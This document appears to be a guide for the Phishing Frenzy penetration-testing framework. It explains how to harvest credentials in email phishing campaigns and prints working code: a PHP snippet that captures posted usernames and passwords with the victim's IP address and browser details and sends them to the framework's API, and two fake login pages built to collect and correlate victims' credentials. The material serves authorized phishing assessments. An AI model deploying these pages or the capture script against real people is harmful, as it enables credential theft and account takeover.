Credential Harvesting


Phishing Frenzy supports the process of harvesting credentials with your email phishing campaigns. No need to write your own arbitrary PHP or server side code to grab the credentials. Phishing Frenzy has a robust database that can be leveraged through an accessible API to store harvested credentials.

Phishing Frenzy exposes a public API service which is available solely to capture Phishing credentials. All you need to do as a penetration tester is leverage the framework in its intended fashion to harvest the credentials.

The video below is a video demonstration on how to perform and configure a new template that is used for harvesting credentials. The remainder of this guide will follow along with the video demonstration.

When a campaign goes active within Phishing Frenzy there are some fundamental processes that occur on the backend. In the case of the Phishing Website, every single website file with a PHP extension has a little PHP snippet prepended to the file. The snipped of PHP can be seen below as we explain what this is used for and how we can leverage it.

<?php
// Turn off all error reporting
error_reporting(0);

if (isset($_GET['uid'])) {
  $uid = $_GET['uid'];
  } else {
    header('404 Not Found', true, 404);
    echo "404 Page Not Found";
    exit();
  }

function get_ip() {
    if (function_exists('apache_request_headers')) {
      $headers = apache_request_headers();
    } else {
      $headers = $_SERVER;
    }
    if (array_key_exists('X-Forwarded-For',$headers) && filter_var($headers['X-Forwarded-For'],FILTER_VALIDATE_IP,FILTER_FLAG_IPV4)) {
      $the_ip = $headers['X-Forwarded-For'];
    } elseif (array_key_exists('HTTP_X_FORWARDED_FOR',$headers) && filter_var($headers['HTTP_X_FORWARDED_FOR'],FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
      $the_ip = $headers['HTTP_X_FORWARDED_FOR'];
    } else {
      $the_ip = filter_var($_SERVER['REMOTE_ADDR'],FILTER_VALIDATE_IP,FILTER_FLAG_IPV4);
    }
    return $the_ip;
  }

$password = $_POST['PasswordForm'];
$username = $_POST['UsernameForm'];

if ($password != '') {
  $creds = 'user:' . $username . ' password:' . $password;
}

$ip = get_ip();
$browser = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['HTTP_HOST'];
$url = "<%= GlobalSettings.first.site_url %>" . '/reports/results/';
$data = array('uid' => $uid, 'browser_info' => $browser, 'ip_address' => $ip, 'extra' => $creds);

// use key 'http' even if you send the request to https://...
$options = array(
    'http' => array(
    'header'  => 'Content-type: application/x-www-form-urlencoded',
    'method'  => 'POST',
    'content' => http_build_query($data),
    ),
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);
?>

The first couple lines of PHP is used to determine if a password parameter has been sent to the page using the _POST['PasswordForm'] method. If a password was sent to the PHP page we can then send it to Phishing Frenzy API that is accessible for storing credentials.

The remainder of the PHP gathers and organizes all the paremeters into a single $data variable. This $data variable is then sent off to the Phishing Frenzy API that is responsible for writing the credentials to the database.

Now that we understand what this snippet does, lets go over how we can leverage this code to assist with the Credential Harvesting process.

Once we have created the initial template within Phishing Frenzy we will need to upload some website files through the web UI. The two files that we will focus on for this guide is the "login.php" and "process.php" which can be seen below.

The intial landing page "login.php" will act as a simple login portal that asks the target for a username and password. The second page will be used to gather the credentials from the login page and store them into the databse.

login.php

<html>
<body>

<form method="POST" action="process.php?uid=<?php echo $uid ?>" name="LoginForm" autocomplete="off">
  Username: <input type="text" name="UsernameForm"><br>
  Password: <input type="text" name="PasswordForm"><br>
  <input type="submit" class="submit" value="Login">
</form>

</body>
</html>

Pay close attention to the action of the form. This is crucial because this will be the page where the paramaters are sent. In this case it will pass the contents of $uid and the value of "PasswordForm". This is an important snippet and will almost always be used when Credential Harvesting with Phishing Frenzy. That is because it takes care of passing the $uid which is key when we want to correlate which target entered credentials into the phishing site.

action="process.php?uid=<?php echo $uid ?>"

By the time you load your 2nd page "process.php" the credentials should have already been harvested. This is because the PHP snipped we reviewed earlier is in charge of storing the credentials to the API.

process.php

<html>
<body>

<p>Failed Login</p>

<form method="POST" action="process.html?uid=<?php echo $uid ?>" name="LoginForm" autocomplete="off">
  Username: <input type="text" name="UsernameForm"><br>
  Password: <input type="text" name="PasswordForm"><br>
  <input type="submit" class="submit" value="Login">
</form>

</body>
</html>

We hope this simple example of a login page will give you a basic understanding of how Phishing Frenzy can be leveraged to harvest credentials on your next phishing engagement.